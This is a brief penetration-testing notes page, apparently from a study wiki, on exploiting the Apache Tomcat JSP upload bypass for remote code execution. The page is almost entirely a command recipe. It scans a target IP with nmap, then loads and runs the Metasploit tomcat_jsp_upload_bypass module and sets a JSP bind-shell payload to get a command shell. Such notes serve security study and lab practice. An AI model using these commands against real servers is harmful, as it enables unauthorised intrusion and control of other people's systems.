Apache Tomcat

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution

#Enumeration

db_nmap -sS -sV -O 10.2.24.113

Try tomcat from a browser
- http://10.2.24.113:8080/

services
search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass
info
# Description:
#  This module uploads a jsp payload and executes it.
check
run

Or use a specific payload

set payload java/jsp_shell_bind_tcp
options
set SHELL cmd
run

PreviousCVE-2021-44228 - Apache Log4j NextLinux Exploitation

Last updated 1 year ago